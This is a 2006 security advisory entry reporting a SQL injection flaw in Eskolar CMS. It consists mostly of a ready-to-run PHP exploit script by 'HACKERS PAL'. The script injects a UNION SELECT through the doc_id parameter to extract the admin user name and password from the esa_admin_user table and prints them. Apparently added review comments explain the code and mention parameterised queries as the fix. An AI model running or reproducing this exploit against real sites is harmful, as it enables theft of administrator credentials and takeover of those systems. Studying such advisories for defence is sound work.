Eskolar CMS Remote Sql Injection

2006-09-23T00:00:00
ID SECURITYVULNS:DOC:14394
Type securityvulns
Reporter Securityvulns
Modified 2006-09-23T00:00:00

Description

Hello,

Eskolar CMS Remote Sql Injection

Discovered by: HACKERS PAL — Copyright: HACKERS PAL — Website: http://www.soqor.net — Email address: security@soqor.net

Remote Sql injection :- /index.php?gr_1_id=0&gr_2_id=0&gr_3_id=1&doc_id=10%20union%20select%201,2,3,4,5,6,7,8,password,10,11,12,13,14,15,16,user,18,19,20,21,22,23,24,25,26%20FROM%20esa_admin_user/*

Exploit:

!/usr/bin/php -q -d short_open_tag=on

<? / / Eskolar CMS Remote sql injection exploit / By : HACKERS PAL / WwW.SoQoR.NeT / print_r(' /*******/ / Eskolar CMS Remote sql injection exploit / / by HACKERS PAL <security@soqor.net> / / site: http://www.soqor.net /'); if ($argc<2) { print_r(' / -- / / Usage: php '.$argv[0].' host / Example: / /* php '.$argv[0].' http://localhost/eskolar/ /*******/ '); die; } error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5);
// NOTE(review): the line above was flattened onto a single line when the advisory was
// rendered (the "/ /" runs look like the remains of comment banners). The statements it
// carries are: a print_r() banner, a usage message followed by die when no host argument
// is given ($argc<2), error_reporting(0) — which silences every warning from the fopen,
// fread and preg_* calls further down, so failures are not reported — no script time
// limit, and a 5 second default socket timeout.

// $url is the target base URL taken from argv[1]; $exploit is the query string appended
// to it. The doc_id value is a UNION SELECT that pulls the user and password columns of
// esa_admin_user into the rendered page, which is only possible when the CMS places
// doc_id in its SQL unsanitised (inferred from the advisory, not visible here). On the
// CMS side, casting doc_id to int or binding it as a prepared-statement parameter
// removes this class of injection.
$url=$argv[1]; $exploit="/index.php?gr_1_id=0&gr_2_id=0&gr_3_id=1&doc_id=10%20union%20select%201,2,3,4,5,6,7,8,password,10,11,12,13,14,15,16,user,18,19,20,21,22,23,24,25,26%20FROM%20esa_admin_user/*"; $page=$url.$exploit; Function get_page($url) {
// Fetch $url and return the response body as a string.
// Uses file_get_contents() when it exists, otherwise falls back to fopen()/fread() in
// 1024-byte chunks. Neither path checks for failure: fopen()'s return value is not tested,
// $fp is never fclose()d, and on the fallback path $contents is appended to without being
// initialised, so a failed request silently yields an empty/NULL result (the notice is
// hidden by error_reporting(0) above).

              if&#40;function_exists&#40;&quot;file_get_contents&quot;&#41;&#41;
              {

                   $contents = file_get_contents&#40;$url&#41;;

                      }
                      else
                      {
                          // fallback: read the stream until fread() returns a falsy chunk
                          $fp=fopen&#40;&quot;$url&quot;,&quot;r&quot;&#41;;
                          while&#40;$line=fread&#40;$fp,1024&#41;&#41;
                          {
                           $contents=$contents.$line;
                          }


                              }
                   return $contents;
     }
     // Shared counter read and written by get() below: stays 0 until the first match
     // has been printed, so get() can tell the first value from all later ones.
     $i=0;

     // Callback for the preg_replace_callback() calls further down. $var is the match
     // array, so $var[1] is the pattern's first capture group (trimmed before use).
     // On the first invocation (global $i still 0) the value is labelled "User Name" and
     // $i is bumped; on every later invocation it is labelled "Pass Word".
     // Nothing is returned (NULL), so the callers' replacement result is effectively
     // discarded — the function exists only for its echo side effect.
     function get&#40;$var&#41;
     {
      GLOBAL $i;
       $var[1]=trim&#40;$var[1]&#41;;
      if&#40;$i==0&#41;
      {
      Echo &quot;&#92;n[+] User Name : &quot;.$var[1];
      // only the very first match anywhere is treated as the user name
     $i++;
      }
      else
      {
      Echo &quot;&#92;n[+] Pass Word : &quot;.$var[1];
              }


     }

 // Fetch the page for the crafted URL built above ($page is reused to hold the body).
 $page = get_page&#40;$page&#41;;

 // Bail out unless BOTH patterns match: the bgcolor='#FF0000' table row whose centred
 // <div> holds the first injected column, and the <td><a href="..." target="_blank"> link.
 // Because get_page() returns an empty/NULL body on any network failure, a connection
 // problem is reported with the same "Exploit Failed" message as a non-vulnerable target.
 if&#40;!preg_match&#40;&#39;/&#92;&lt;tr bgcolor=&#92;&#39;#FF0000&#92;&#39;&gt;&lt;td&gt;&lt;div align=&#92;&#39;center&#92;&#39;&gt;&#40;.+?&#41;&lt;&#92;/div&gt;&lt;&#92;/td&gt;&lt;&#92;/tr&gt;/is&#39;,$page&#41;||!preg_match&#40;&#39;/&#92;&lt;td&gt;&lt;a href=&#92;&quot;&#40;.+?&#41;&#92;&quot; target=&#92;&quot;_blank&#92;&quot;&gt;&#40;.+?&#41;&lt;&#92;/a&gt; &lt;&#92;/td&gt;/is&#39;,$page&#41;&#41;
 {
          Die&#40;&quot;&#92;n[-] Exploit Failed&#92;n/* Visit us : WwW.SoQoR.NeT                   */&#92;n/**********************************************/&quot;&#41;;
 }

 // preg_replace_callback() is used purely for its side effect: the string callable 'get'
 // echoes each match's first capture group and the replaced string is discarded (the
 // return value is not assigned). The first call feeds get() while $i is 0, the second
 // while $i is already 1 — that ordering is what makes the labels come out as they do.
 preg_replace_callback&#40;&#39;/&#92;&lt;tr bgcolor=&#92;&#39;#FF0000&#92;&#39;&gt;&lt;td&gt;&lt;div align=&#92;&#39;center&#92;&#39;&gt;&#40;.+?&#41;&lt;&#92;/div&gt;&lt;&#92;/td&gt;&lt;&#92;/tr&gt;/is&#39;,&#39;get&#39;,$page&#41;;

 preg_replace_callback&#40;&#39;/&#92;&lt;td&gt;&lt;a href=&#92;&quot;&#40;.+?&#41;&#92;&quot; target=&#92;&quot;_blank&#92;&quot;&gt;&#40;.+?&#41;&lt;&#92;/a&gt; &lt;&#92;/td&gt;/is&#39;,&#39;get&#39;,$page&#41;;

 // Closing banner; Die() ends the script here.
          Die&#40;&quot;&#92;n/*       Visit us : WwW.SoQoR.NeT             */&#92;n/**********************************************/&quot;&#41;;

?>

WwW.SoQoR.NeT